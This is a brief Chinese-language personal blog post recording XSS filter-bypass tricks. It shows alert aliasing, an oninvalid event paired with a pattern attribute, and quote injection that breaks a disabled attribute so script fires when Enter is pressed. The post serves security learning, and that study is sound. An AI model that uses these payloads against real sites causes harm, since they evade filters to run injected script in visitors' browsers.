Mamor's Blog
0%

记一次XXS绕过学习

发表于 更新于
本文字数: 585 阅读时长 ≈ 1 分钟

参考原文 https://mp.weixin.qq.com/s/ZCWdfnObwBkHUR8he6XxlA

alert绕过

alert(1) --- > a=alert;a(1)


事件拦截绕过

<input type="text" pattern="a" oninvalid="alert(1)" />

oninvalid事件会以正则表达式去判断pattern的值,如果输入框内的值不全等余“a”

<input type="text" pattern="a" oninvalid="a=alert;a(1)" />


disable属性绕过

disable="disable" ---> a="disable="disable"




xss 插入的 type 即是 text 又是 submit,在文本框中按回车即可触发

1
2
3
<form action="">
<input type="text" value="xss" oninvalid=a=alert;a(1) pattern="a" type="submit" a=" disabled="disabled" style="margin-top: 1px;">
</form>

欢迎关注我的其它发布渠道

------------- 💖 🌞 本 文 结 束 😚 感 谢 您 的 阅 读 🌞 💖 -------------